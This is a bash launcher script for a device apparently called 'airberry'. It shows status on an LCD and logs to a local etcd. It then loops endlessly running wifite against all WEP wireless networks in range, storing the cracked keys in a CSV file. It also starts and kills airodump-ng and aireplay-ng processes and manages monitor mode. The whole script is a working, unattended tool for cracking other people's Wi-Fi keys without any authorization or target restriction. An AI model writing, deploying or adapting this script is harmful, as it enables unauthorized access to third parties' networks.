#!/usr/bin/env bash
export HERE=$(cd $(dirname "$0") ; pwd)
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/bin:$HERE
export HOME=/root
export ME=$(basename "$0")
# On some backlight, backlight is on when 0 is sent...
BL_ON=0
BL_OFF=1
source /etc/airberry.conf
function Log() {
	echo "[$(date "+%Y/%m/%d %H:%M")] ""$@"
    curl -s -L http://127.0.0.1:$ETCD_PORT/v2/keys/$ETCD_DIR/status -XPUT -d value="$ME:info:$@" >/dev/null
}
Log 'Starting'
Log 'Backlight off'
$HERE/lcd.py backlight $BL_OFF
Log 'Displaying logo'
$HERE/airberry_logo.py ; sleep 3
if ! /etc/init.d/etcd status >/dev/null 2>&1 
then
	echo 'Etcd is not running. Exiting.'
	exit 1
fi
if  ! ifconfig -a $IFACE >/dev/null 
then
	Log "$IFACE not found"
	$HERE/lcd.py text 0 0 "No wireless,  nothing to    crack"
	(sleep  10 ; [ -n "$(hostname -I)" ] && $HERE/lcd.py text 0 0 $(hostname -I)) &
	exit 1
fi
echo $$ > /var/run/$(basename "$0").pid
Log 'Launching check-fs-space' ; nohup $HERE/check-fs-space.sh /tmp > /dev/null &
Log 'Launching airberryd' ; nohup $HERE/airberryd.py > /var/log/airberryd.log &
Log 'Cleaning "from_reboot" dir of etcd' ; curl http://127.0.0.1:$ETCD_PORT/v2/keys/cracked/from_reboot?recursive=true -XDELETE >/dev/null
#airmon-ng start wlan0
# Sort according to essid
touch $HOME/cracked.csv
sort -u -t ',' -k 3 $HOME/cracked.csv $HERE/cracked.csv > /tmp/c
mv /tmp/c $HERE/cracked.csv
rm -f $HOME/cracked.csv
ifconfig ${IFACE}mon 2>/dev/null && Log "Deactivating ${IFACE}mon" && airmon-ng stop ${IFACE}mon
while true
do
	Log 'Looping...'
    # If cracked.csv is not here, swicth off light, as I'm probably debbuging something...
    [ ! -e $HERE/cracked.csv ] && $HERE/lcd.py backlight $BL_OFF
	#$HERE/lcd.py cls
	#$HERE/lcd.py text 0 2 'Wifite'
	cd $HOME # As wifite save cracked.csv in the dir it was run from
	Log "Launching wifite"
	$HOME/bin/wifite.py --wep -1 --all --scan-time 60 --power 15 --etcd $ETCD_DIR >>/var/log/wifite.out
	Log "Cleaning dirs"
	ps -C airodump-ng -O cmd | grep tmp | awk '{print $12}' | while read d ; do [ -z "$d" ] && continue ;dir="$(dirname $d)"; Log "> $dir" ; rm -rf "$dir" ; done
	for cmd in airodump-ng aireplay-ng
	do
		Log "Killing stall processes"
		pkill "$cmd"
	done
    airmon-ng stop ${IFACE}mon
	# Log "Launching broadcast-keys"; $HERE/broadcast-keys $DISPLAY >> /tmp/wifite.out
done
